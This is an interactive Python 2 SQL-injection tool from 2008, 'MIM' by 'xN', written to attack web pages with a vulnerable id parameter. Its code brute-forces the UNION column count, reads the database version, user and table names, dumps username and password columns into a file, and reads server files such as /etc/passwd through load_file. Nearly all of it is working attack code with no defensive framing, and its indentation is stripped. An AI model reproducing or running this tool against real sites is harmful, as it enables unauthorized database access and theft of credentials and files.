#!/usr/bin/env python
# MIM v 0.2.Sql-inj helper.
# By xN. 2008 .ICQ 667888.
#--------------go--------------#
import sys,urllib2,string,urllib
#--------------prms--------------#
ff01="%27"
ff02=["CHAR(62,62,62,77,77,84,69,83,84,60,60,60)"]#>>>MMTEST<<<
ff03="Query failed : You have an error in your SQL syntax"#vurn
ff04="You have an error in your SQL syntax"#badvurn..
ff05="Query failed : Unknown column"
ver="0.2"
#--------------func--------------#
def o(t):
print "[o]%s"%t
def p(t):
print "[+]%s"%t
def m(t):
print "[-]%s"%t
def h(t):
print "[?]%s"%t
def help():
h("Commands:")
h("brute [http://targer.com/script.php?id=]- brute col numz.")
h("dt [http://targer.com/script.php?id=] - Check DB info, do3n tables. ")
h("gl [http://target.com/script.php?id=] - take list from table(user;pass) into file.")
h("lf [http://target.com/script.php?id=] - Try 2 l0ad a file.. ")
h("char [text] - Mysql char")
h("h - help.")
h("q -quit.")
def checkER(t):
if ff03 in t:
p("Yes.We have Error :-).")
elif ff04 in t:
o("We have syntax error..")
else:
m("No MySQL error:-/")
def char(t):
ag=[]
for x in xrange(len(t)):
ag.append("%s"%ord(t[x]))
afff="CHAR(%s)"%(",".join(ag))
return afff
def tinfo(fu,aff,cws,t):
aff[int(cws)-1]="concat(CHAR(88,88,99,87),%s,CHAR(88,88,99,87))"%fu
u="%s1+union+select+%s"%(t,",".join(aff))
#o(u)
r=urllib2.urlopen(u)
data=r.read()
result=data.split("XXcW")
return result
def minfo(fu,aff,cws,t,fr,wh,i,sep):
aff[int(cws)-1]=("concat(CHAR(88,88,99,87),%s,CHAR(88,88,99,87))")%(",%s,"%char(sep)).join(fu) # make q.
if wh<>'':
u="%s1+union+select+%s+from+%s+where+%s=%s"%(t,",".join(aff),fr,wh,i)
else:
u="%s1+union+select+%s+from+%s"%(t,",".join(aff),fr)
o(u)
r=urllib2.urlopen(u)
data=r.read()
result=data.split("XXcW")
#o(len(result))
if ff05 in data:
m("Unkown column finded")
return ''
else:
if len(result)<>1:
return result[1]
else:
return ''
def tt(tabl,aff,cws,t):
aff[int(cws)-1]="concat(CHAR(88,88,99,87),table_name,CHAR(88,88,99,87))"
u="%s1+union+select+%s+FROM+INFORMATION_SCHEMA.TABLES+LIMIT+%s,1"%(t,",".join(aff),tabl)
r=urllib2.urlopen(u)
data=r.read()
result=data.split("XXcW")
return result
def podgotovit(kol):
ff=ff02*kol
for i in xrange(kol):
ff[i]="concat(%s,%s)"%(ff[i],i)
result=",".join(ff)
return(result)
def brute(t):
u=t
MAX=100 # max kol-v0 stolbcov :-)
try:
o("Testing url..")
r=urllib2.urlopen(u)
p("Okay.let's Check Mysql error..")
u=("%s%s")%(t,ff01)
r=urllib2.urlopen(u)
checkER(r.read())
o("Now brute..")
for i in xrange(1,MAX):
u=(("%s1+union+select+%s")%(t,",".join(ff02*i)))
r=urllib2.urlopen(u)
if ">>>MMTEST<<<" in r.read():
o("columns=%s"%i)
tot=i
break #stop brute.
else:
pass
o("What we see?..")
zzz=podgotovit(tot)
u=(("%s1+union+select+%s")%(t,zzz))
r=urllib2.urlopen(u)
p("Url opened..")
col=''
ab=r.read()
for i in xrange(tot):
if (ab.find(">>>MMTEST<<<%s"%i)<>-1):
i+=1
p("We see column:%s"%(i))
col="%s %s"%(col,i)
else:
pass
p("Work completed.Columns we see:%s."%col)
except:
m("BAD.")
def dt(t):
try:
o("Testing url..")
r=urllib2.urlopen(t)
p("Ok.")
c=input("[>]Columns(28):")
cws=raw_input("[>]One Column we see(22):")
aff=["null"]*c
try:
version=tinfo("version()",aff,cws,t)
p("ver:%s"%version[1])
except:
m("problems with version()")
try:
db=tinfo("database()",aff,cws,t)
p("DB:%s"%db[1])
except:
m("Problems with database()")
try:
us=tinfo("user()",aff,cws,t)
p("user:%s"%us[1])
except:
m("Problems with user()")
o("Now tables list..")
MAXT=150 # u can rechange it.
for i in xrange(1,MAXT):# MAXT -max tables
try:
a777=tt(i,aff,cws,t)
if a777[1]<>'':
o(("%s)%s")%(i,a777[1]))
else :
break
except:
pass
except:
m("BAD.")
def gl(t):
try:
o("Testing url..")
r=urllib2.urlopen(t)
p("Ok.")
c=input("[>]Columns(28):")
ta=raw_input("[>]What u want to get 1[whitespace]2..(username password date):")
cws=raw_input("[>]Column we see(22):")
sep=raw_input("[>]Separator(; , - ,etc.):")
ft=raw_input("[>]From[whitespace]to(1 1000)('' if u dont want use where):")
wh=raw_input("[>]Where?(id)(''=without where):")
tabl=raw_input("[>]From table(users):" )
try:
ftw=raw_input("[>]Output file:")
ftw=open(ftw,"a")
ftw.write("#Created with MIM by xN.\n")
flag=1
except:
m("BAD file.")
flag=0
if flag==1:
aff=["null"]*c
ta=ta.split()
ft=ft.split()
a=0
if wh<>'':
for i in xrange(int(ft[0]),int(ft[1])):
try:
a666=minfo(ta,aff,cws,t,tabl,wh,i,sep)
if a666<>'':
ftw.write("%s\n"%a666)
o("%s - ok."%i)
a+=1
else:
m("%s - bad."%i)
except:
pass
else:
try:
a666=minfo(ta,aff,cws,t,tabl,'',0,sep)
if a666<>'':
ftw.write("%s\n"%a666)
o("ok.")
a+=1
else:
m("bad.")
except:
pass
p("Okay total:%s"%a)
else:
pass
except:
m("BAD.")
def lf(t):
try:
fla=1
o("Testing url..")
r=urllib2.urlopen(t)
p("Ok.")
c=input("[>]Columns(28):")
cws=raw_input("[>]Column we see(22):")
ftg=raw_input("[>]file to get(/etc/passwd):")
otf=raw_input("[>]In?(/home/user/evil):")
aff=["null"]*c
try:
fww=open(otf,'a')
fww.write("#Created with MIM by xN.\n" )
except:
fla=0
m("BAD file.")
if fla <>0:
lof=tinfo(("load_file(%s)"%char(ftg)),aff,cws,t)
p("complete!")
if len(lof)>1 :
o("Saving..")
fww.write(lof[1])
else:
m("No file on server ,or load_file doesnot work=/.")
o("Work complete!:)")
else:
pass
except:
m("BAD.")
#--------------main--------------#
o("Hello !Im Mysql-injectinon master.V[%s].By xN[ef] "%ver)
help() # show help.
o("------------------------------------------------------")
while 1:
#go?
c=raw_input("[>]")
c=c.split(" ")
if c[0] =="q":
sys.exit(o("bye!"))
elif c[0] == "h":
help()
elif c[0] == "brute":
try:
brute(c[1])
except:
m("No url.")
elif c[0] == "dt":
try:
dt(c[1])
except:
m("No url.")
elif c[0] == "gl":
try:
gl(c[1])
except:
m("No url.")
elif c[0] == "lf":
try:
lf(c[1])
except:
m("No url.")
elif c[0] == "char":
try:
o(char(" ".join(c[1:])))
except:
m("BAD.")
else:
o("bad cmd!")
#--------------END----------xN.-#